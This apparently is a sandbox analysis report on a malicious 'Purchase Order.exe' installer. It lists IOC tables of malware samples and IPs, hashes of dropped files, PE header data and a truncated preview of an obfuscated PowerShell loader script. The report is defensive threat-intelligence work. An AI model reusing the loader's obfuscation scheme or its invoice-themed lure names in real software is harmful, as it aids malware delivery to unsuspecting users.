WIFIKU-AS-IDPTWifikuIndonesiaID | JPEG00774533.vbs | malicious | Remcos, GuLoader | 103.253.17.222
WIFIKU-AS-IDPTWifikuIndonesiaID | CamScanner0091.vbs | malicious | Remcos, GuLoader | 103.253.17.222
WIFIKU-AS-IDPTWifikuIndonesiaID | PI00232.vbs | malicious | Remcos, GuLoader | 103.253.17.222
WIFIKU-AS-IDPTWifikuIndonesiaID | Spare_part_list.xls | malicious | Lokibot | 103.253.17.249
WIFIKU-AS-IDPTWifikuIndonesiaID | 57m#U00b3_LPG_SEMI_TRAILER_7_NOS.pdf.xls | malicious | AgentTesla | 103.253.17.249
WIFIKU-AS-IDPTWifikuIndonesiaID | EUCjx7V4L9.elf | malicious | Gafgyt, Mirai | 116.0.5.90
ATOM86-ASATOM86NL | x1TYUNtEO1zz.exe | malicious | Remcos, PrivateLoader | 178.237.33.50
ATOM86-ASATOM86NL | xq5lqKlBeIAJ.exe | malicious | Remcos, PrivateLoader | 178.237.33.50
ATOM86-ASATOM86NL | 1715327885f20f31f2f517c98cb2c7e927c5676435d894ec2de190282251b350f38ab136db927.dat-decoded.exe | malicious | Remcos, PrivateLoader | 178.237.33.50
ATOM86-ASATOM86NL | Palmebladstag.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | 2024090533201.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | JaXXnpJZ3z.exe | malicious | Remcos, DBatLoader, PrivateLoader | 178.237.33.50
ATOM86-ASATOM86NL | payment_0045k.xls | malicious | Remcos, DBatLoader, PrivateLoader | 178.237.33.50
ATOM86-ASATOM86NL | License authorization Custom invoice INFO - Factura Aduana INFO (2).xls | malicious | Remcos, PrivateLoader | 178.237.33.50
ATOM86-ASATOM86NL | #U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exe | malicious | Remcos, PrivateLoader | 178.237.33.50
ATOM86-ASATOM86NL | IW7w68n6vf.exe | malicious | Remcos, PrivateLoader | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | fx28wfnZ4J.exe | malicious | Babuk, Djvu, PrivateLoader, SmokeLoader | 13.107.137.11
37f463bf4616ecd445d4a1937da06e19 | uJ5c4dQ44E.exe | malicious | Unknown | 13.107.137.11
37f463bf4616ecd445d4a1937da06e19 | uJ5c4dQ44E.exe | malicious | Unknown | 13.107.137.11
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | PrivateLoader, Vidar | 13.107.137.11
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | PrivateLoader, RisePro Stealer | 13.107.137.11
37f463bf4616ecd445d4a1937da06e19 | YN9hIXWLJ3.exe | malicious | Unknown | 13.107.137.11
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.FileRepMalware.16991.21545.exe | malicious | Unknown | 13.107.137.11
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | PrivateLoader, Vidar | 13.107.137.11
37f463bf4616ecd445d4a1937da06e19 | Form_W-9_Ver-083_030913350-67084228u8857-460102.js | malicious | Bazar Loader, BruteRatel, Latrodectus | 13.107.137.11
37f463bf4616ecd445d4a1937da06e19 | MSI.msi | malicious | Bazar Loader, BruteRatel, Latrodectus | 13.107.137.11
                                                        No context
Process: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe
File Type: JSON data
Category: dropped
Size (bytes): 965
Entropy (8bit): 5.001941246976737
Encrypted: false
SSDEEP: 12:tk90nd6UGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qydVauKyGX85jrvXhNlT3/7sYDsro
MD5: 78C8B1980A44EC0056916F33798215A6
SHA1: 702E41B4FE247C110995FD536D130321A2F8A73B
SHA-256: 417ADAFBA3D3171CC83ABA06E8170014BEDD2952EF87C74621CB72FE39B6C9E4
SHA-512: E82F0524E13FECC3DFD8D30CB9AD6C55B17F95924EC5AB15F8A6424411437A937AB0FE1D54993B1B07301EE7649A6344ED8C59B1C96997C01CB205DA32A80C09
Malicious: false
Reputation: low
                                                        Preview:{. "geoplugin_request":"191.101.61.26",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 8003
Entropy (8bit): 4.838950934453595
Encrypted: false
SSDEEP: 192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
MD5: 4C24412D4F060F4632C0BD68CC9ECB54
SHA1: 3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
SHA-256: 411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
SHA-512: 6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
Malicious: false
Reputation: moderate, very likely benign file
                                                        Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 580232
Entropy (8bit): 7.278907180417852
Encrypted: false
SSDEEP: 12288:ja+TesAUQUC4Mpx3Y1JbSd+xQgVN9pmdVepFq:28esAfUPGI1h3RHY8rq
MD5: 996CD1A4008E0FCA3750E9524BD13A9D
SHA1: F202D20579BA03ACB804F651BF66E2AB47ADD4C8
SHA-256: 00473AE2A9E945343456D0193E1A5FE58C71776F42E747249A3C435B8CE7E1BB
SHA-512: 8B71BEB452CB4F03F6E9FC897EC1164F5EC8E547D3C6EE57AB5C07CCA22D5CD71371F8DEE45CB63E7BEC838DC4B30B34A187B5E81439B3E71553B35A71F9E7B2
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 8%
• Antivirus: Virustotal, Detection: 21%
Reputation: low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....c.W.................`...|.......1.......p....@.......................................@.................................4u......................0...X............................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...................................rsrc............ ...~..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:ASCII text, with very long lines (54742), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):54742
                                                        Entropy (8bit):5.3420724390824335
                                                        Encrypted:false
                                                        SSDEEP:768:Zr3HLXpjUO3JeU2JLhAowJbUPrtzDuJ+DUn6fdq/NJik8Cd9aLrVwAtgCh4xMWYG:F3HFjzIhHwVUZDhDUn6Fckk8X9tLk5
                                                        MD5:018320E11E60BB8E3984A6A7E0C4AA62
                                                        SHA1:924A0B4842B51F8D33B5C3998CADC17A945EC395
                                                        SHA-256:DBB582447B41B996AFC08D70E36632A91291EB6980C6B0B25D22B0AC6963AE94
                                                        SHA-512:8F90013F22DACCB297681BD2280A441D3BE4F773749A6B41C12FECBC9CE0FB898C8FC446B83A717D4E74FE5E17D2D470E4AAA600150020D0C3A64FBDB3FDC174
                                                        Malicious:true
                                                        Preview:$Triumferne=$Sprgetid;<#Communicability Dzungar Hjernesvulsterne Knitren Ksnehandlen #><#Dotonidae Unsoothed Engsnarers #><#Indico unswooning Spagfrdigstes Epiplankton Biskoppeligt Provinsens #><#Resinbush Multicentric Fangotherapy Indersider Kistebunden undisputedness #><#Ledsag Haglike Aflokket #><#Landingens Kartoteksprogrammernes Regnearksprogrammets Renoveringerne enzymic #>$Acrestaff = "Quadr; ConfFStabbuCa,cinConducSupert DeroiynkenoThyrinNegat RuneVth,aze,dsknr StrabQuidaePaa.an.asplaMill lPolypiPreflnMispl Sejrs(Overd`$ReatiZMin aogendin KabeeunderimuddenS.aaed prindEnchaeChalllLysbaiinternBulksgRentae dolknMa,rosDomsf,Koord .ouri`$pyo eTBungar,talwsAtel,kTandkeEvolem JernaSatses Arm.k,iliai AntinT dddeByggerGaribnA.ndseAnbef No pr=Qui t Jagtu0,aang)Con,u{nonf,.,alku`$ArmstOSubarm ButtbcalatuHartvdFagted .neee Lengt,alut= Vice-In.ek4Bekmp0Typom8 Cata2Fores4Taag.+K.mpo4 Cerv0.haps8Speku2Subli6Grad,; Sk t Dolla Sorte Festu Terra`$R magSUnwaryPattasGder tUn oueUndermJuttasTempek
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):315171
                                                        Entropy (8bit):7.745198370059857
                                                        Encrypted:false
                                                        SSDEEP:6144:lAn349ds/cjESEPhWlxjk2u0Rf6gVZJxap1+b4JU4Svm8wmW:lAn6d5jE7KQN0RbVZJO1Y/+8fW
                                                        MD5:C1FBA61F3748F78794EC70903F7FFAEE
                                                        SHA1:0E2C3A91817C8E947E9AE29C829FA032C9749555
                                                        SHA-256:C2BD4688C907E952A30409CC0FE01BE992B9B3EB7A8E7482855E1704AEEBF8FC
                                                        SHA-512:DFCBBD2A67D96AE8FA4BA3374880772F52C0B14CF80D1D2FF1E5609994146E3BB879E27366DB9C77DDEE67DED3070CDCB06C1A4303B99CB881566DF953410C71
                                                        Malicious:false
                                                        Preview:...//....7.............%.L......jj........................**...............a....55.(.......`.X.................. ...AAA...............0................AAAA...........X..........r.k..ZZZZ.....,,.......h...............\\.QQ......".DD...d................~~.u......h.XX.A.................v......XX........^^..W......................KKKKKKKKK.#..........22.VVVVV..............J....@@@...LL...........................rr......ggggg..............................[[[..DD..........................................W.........................q.....pppp......W........,,,,...CC.&&..........g...|||...............JJJ.........!!....ooo....*........................?..R.....O...................:............!!.../..4.U.........T...................&...........J.................''..@........]...LL....X...............~~......... ....&&&.......&&.......................F..........8................c.........s................(...QQQ...............;;...**.......VVV...........L................].................\........
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):323310
                                                        Entropy (8bit):0.1590287823589042
                                                        Encrypted:false
                                                        SSDEEP:384:BJ+9Y0WGqEqiQ5th06IJhE5eFnOR8VuD9DtnNYzhF:G6b8Aq
                                                        MD5:95E317BA14F87FBB97BC0DF53515A13E
                                                        SHA1:E02E59691C7EB6223B8D44230B3A304BC913328C
                                                        SHA-256:BD111067FBB3A820F40605AD6BC7A12362D49AA74DFE7F834CA374E94BDDC6AF
                                                        SHA-512:BC23A4C81BFAB13032E9E5930AD12AA0C1F05D363219BFB56B966B2F040E6FD843585E416E1E70A2373B3D1C844155B06E6AD2FEBFD238193DD7BB1D04BFA424
                                                        Malicious:false
                                                        Preview:......................................................................................................................................................................................................................................................................................................................................................................................................................................................................./.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h..........................................................
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):283572
                                                        Entropy (8bit):0.15868574660676088
                                                        Encrypted:false
                                                        SSDEEP:384:0rGOeN3Ba/V0pYYikHg+zEuSpPzyFLnfyytTBt:W8aN0VBYprirR
                                                        MD5:73FE342DC28D471033C8BAE7496862E4
                                                        SHA1:2C9929F233A5677A41425E2F17893E76B4C2E166
                                                        SHA-256:D90BF06CC1B915E36C02581F7BBB3B4BA29F86AA5FD657847AA6C4A17D764DDE
                                                        SHA-512:9695030A3330DCAA69B3C6EF6C4C9D71B8711D3EE06FA712769E5B37AC14F1300A4DB2A3DD6ECEA328308ACED99D33B28BE79E33F1470A04B5E6BCCCF1BFDDD3
                                                        Malicious:false
                                                        Preview:..........................................................................................................................................................................................................................W..................................................................................................................................................................................*.....................R...................................................................................................................................................................................................................................................................................................................k.....................................................................................................................................................................................................m..........................................................................
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):115812
                                                        Entropy (8bit):0.15848441031298327
                                                        Encrypted:false
                                                        SSDEEP:48:lWhD2COv9WF02C4QVsAbMbymyOaWkkraIDrpAFpw+v:lWh2XelCxsAobMWkk2+pSpFv
                                                        MD5:B137686867BBB8B14FD33FB386AE6B1B
                                                        SHA1:C92A2EA50F6E56CD52380E49202DADFDA66CA4AA
                                                        SHA-256:DB772C54087D43112B92C0A06D83DDA60F9A4626D6144229CE7A5AAB5CEFD1A6
                                                        SHA-512:7FBBE4BFB4B24F1EAE0E4D2BF07A12CCDEFC8959AF08D85B88B350E5FA0F0DB85F1B3B457C5AB511BEC30975659FDF3332DFD4C23D661A3C47586B6DF7DFC22E
                                                        Malicious:false
                                                        Preview:.............................................................................................................................................x.r...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................5......................................................................o..........................................................................................................................................................................D..........................................................................................................................................
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):379
                                                        Entropy (8bit):4.273007664169869
                                                        Encrypted:false
                                                        SSDEEP:6:o4wKuOetVqxI9NBN2RGE7oL9VxZhGhuzXer5MmybqCkIhwHM+:P/uOetIxI9R2RviPZb7erBJCkWSj
                                                        MD5:3013D03832E464117D1C632297416EC8
                                                        SHA1:97B3B4BDD9D5ED938856A7302E113AB75F3E0592
                                                        SHA-256:689DC1B4EB7F689FDF50574C78CDADDE2D77DD9F6CA02596DD46008D960A3BAA
                                                        SHA-512:6F92BCD321EDAB62F030541C4F08359258C028223F2A30DDFB52322800425992C17571EB789CDAE4E7242ED784E3D14E4F9B5A55DFE5BD3E90BF12559AE273D9
                                                        Malicious:false
                                                        Preview:probere sydover cannabisens humpendes tupanship utriculariaceae..natbordsskuffers amortization clasped nonruinously rusgift sulphazotize ruinatious..ndsignaler unbeloved gruedes nonliteracy modefolkenes..sstjernerne runden scribbling frdselslreres pulverisers petara..snurrige overblow talker ferri statusoptllingen undeniableness,nonpaid mongreldom bundgarnenes gudruns sarcina.
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.278907180417852
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:Purchase Order.exe
                                                        File size:580'232 bytes
                                                        MD5:996cd1a4008e0fca3750e9524bd13a9d
                                                        SHA1:f202d20579ba03acb804f651bf66e2ab47add4c8
                                                        SHA256:00473ae2a9e945343456d0193e1a5fe58c71776f42e747249a3c435b8ce7e1bb
                                                        SHA512:8b71beb452cb4f03f6e9fc897ec1164f5ec8e547d3c6ee57ab5c07cca22d5cd71371f8dee45cb63e7bec838dc4b30b34a187b5e81439b3e71553b35a71f9e7b2
                                                        SSDEEP:12288:ja+TesAUQUC4Mpx3Y1JbSd+xQgVN9pmdVepFq:28esAfUPGI1h3RHY8rq
                                                        TLSH:30C402F96B597916CB900B754873C6351232AD45AF704B0F2FE8B53A3BF10B78903A69
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....c.W.................`...|.....
                                                        Icon Hash:cf3144507064318f
                                                        Entrypoint:0x40310f
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x5795639A [Mon Jul 25 00:55:54 2016 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                        Signature Valid:false
                                                        Signature Issuer:E=Bankdirektoer@Forbindsstoffers.Nu, O=Allegorisxur, OU="lampshell lossende Unvistaed ", CN=Allegorisxur, L=Haroué, S=Grand Est, C=FR
                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                        Error Number:-2146762487
                                                        Not Before, Not After
                                                        • 01/11/2023 04:33:53 31/10/2026 04:33:53
                                                        Subject Chain
                                                        • E=Bankdirektoer@Forbindsstoffers.Nu, O=Allegorisxur, OU="lampshell lossende Unvistaed ", CN=Allegorisxur, L=Haroué, S=Grand Est, C=FR
                                                        Version:3
                                                        Thumbprint MD5:BBCFE93B54A681175BE69A09168D3B9E
                                                        Thumbprint SHA-1:248713EDBC6E4D4E717F3CDF8B01D51BFBCEB38F
                                                        Thumbprint SHA-256:1F9293305E8A416424382F27ED18698557856AB70F1DAE171DC01B8A160E3354
                                                        Serial:5F6701B5EE17D55029DA4372E8A98347A5966E5C
                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 00409198h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004070A8h]
                                                        call dword ptr [004070A4h]
                                                        cmp ax, 00000006h
                                                        je 00007F6C34561C93h
                                                        push ebx
                                                        call 00007F6C34564C01h
                                                        cmp eax, ebx
                                                        je 00007F6C34561C89h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 00407298h
                                                        push esi
                                                        call 00007F6C34564B7Dh
                                                        push esi
                                                        call dword ptr [004070A0h]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007F6C34561C6Dh
                                                        push ebp
                                                        push 00000009h
                                                        call 00007F6C34564BD4h
                                                        push 00000007h
                                                        call 00007F6C34564BCDh
                                                        mov dword ptr [0042E404h], eax
                                                        call dword ptr [00407044h]
                                                        push ebx
                                                        call dword ptr [00407288h]
                                                        mov dword ptr [0042E4B8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 00428828h
                                                        call dword ptr [00407174h]
                                                        push 00409188h
                                                        push 0042DC00h
                                                        call 00007F6C345647F7h
                                                        call dword ptr [0040709Ch]
                                                        mov ebp, 00434000h
                                                        push eax
                                                        push ebp
                                                        call 00007F6C345647E5h
                                                        push ebx
                                                        call dword ptr [00407154h]
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7534 | 0xa0 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x49000 | 0x31fa8 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8d030 | 0xa58 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0x5fdd | 0x6000 | 38462d04cfdbc4943d18be461d53cc3e | False | 0.6783854166666666 | data | 6.499697507009752 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata | 0x7000 | 0x1352 | 0x1400 | 3d134ae5961af9895950a7ee0adc520a | False | 0.4583984375 | data | 5.207538993430304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data | 0x9000 | 0x254f8 | 0x600 | 2d00401e0c64d69b6d0ccb877d9f624e | False | 0.4544270833333333 | data | 4.0323505938358934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata | 0x2f000 | 0x1a000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc | 0x49000 | 0x31fa8 | 0x32000 | 3d2d7fb4b8b6f96646c1ee96d192964d | False | 0.4782080078125 | data | 5.276916225410081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        RT_ICON | 0x493b8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.30484739145865375
                                                        RT_ICON | 0x59be0 | 0x9958 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9979366211534543
                                                        RT_ICON | 0x63538 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.37352848433886904
                                                        RT_ICON | 0x6c9e0 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.38803142329020335
                                                        RT_ICON | 0x71e68 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3819674067076051
                                                        RT_ICON | 0x76090 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4515560165975104
                                                        RT_ICON | 0x78638 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4971857410881801
                                                        RT_ICON | 0x796e0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5713114754098361
                                                        RT_ICON | 0x7a068 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6312056737588653
                                                        RT_DIALOG | 0x7a4d0 | 0x144 | data | English | United States | 0.5216049382716049
                                                        RT_DIALOG | 0x7a618 | 0x120 | data | English | United States | 0.5104166666666666
                                                        RT_DIALOG | 0x7a738 | 0x11c | data | English | United States | 0.6056338028169014
                                                        RT_DIALOG | 0x7a858 | 0xc4 | data | English | United States | 0.5918367346938775
                                                        RT_DIALOG | 0x7a920 | 0x60 | data | English | United States | 0.7291666666666666
                                                        RT_GROUP_ICON | 0x7a980 | 0x84 | data | English | United States | 0.7348484848484849
                                                        RT_VERSION | 0x7aa08 | 0x25c | data | English | United States | 0.5149006622516556
                                                        RT_MANIFEST | 0x7ac68 | 0x33d | XML 1.0 document, ASCII text, with very long lines (829), with no line terminators | English | United States | 0.5536791314837153
DLL | Import
KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
